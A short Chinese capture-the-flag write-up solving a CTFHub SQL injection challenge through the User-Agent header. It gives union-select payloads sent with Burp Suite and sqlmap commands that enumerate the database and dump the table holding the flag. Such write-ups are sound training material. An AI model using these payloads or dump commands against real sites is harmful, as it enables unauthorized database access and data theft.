小白一个,如有错误请指正!
UA就是User-Agent的缩写,中文名为用户代理,是Http协议中的一部分,属于头域的组成部分,它是一个特殊字符串头,是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计。
个人感觉UA注入和Cookie注入是有点像的,都是从请求头中修改参数,payload和普通的union注入是一样的。
解法一: Burpsuite抓包
1.爆数据库
User-Agent: 123 union select 1,database()#
2.爆表名
User-Agent: 123 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli'
3.爆字段
User-Agent: 123 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'yfxuvzhgeo'
4.脱裤
User-Agent: 123 union select 1,etojeuvlcc from sqli.yfxuvzhgeo
拿到flag ctfhub{a9709a57175fd1d08eeab4e4}
解法二: sqlmap
sqlmap对于我这种小白来说简直是太香啦,怎么会有那么好用的工具,太爱了!
下面附一个超级详细的sqlmap参数介绍:
因为这里是UA注入,所以我们需要把探测等级提升到3 --level 3
1.爆数据库
sqlmap -u http://challenge-470aa9668eb64381.sandbox.ctfhub.com:10800/ --level 3 --dbs
2.爆表名
sqlmap -u http://challenge-470aa9668eb64381.sandbox.ctfhub.com:10800/ --level 3 -D sqli --tables
3.爆字段
sqlmap -u http://challenge-470aa9668eb64381.sandbox.ctfhub.com:10800/ --level 3 -D sqli -T yfxuvzhgeo --columns
4.脱裤
sqlmap -u http://challenge-470aa9668eb64381.sandbox.ctfhub.com:10800/ --level 3 -D sqli -T yfxuvzhgeo -C etojeuvlcc --dump
成功拿下flag!
参考资料:
https://www.cnblogs.com/waw/p/10828237.html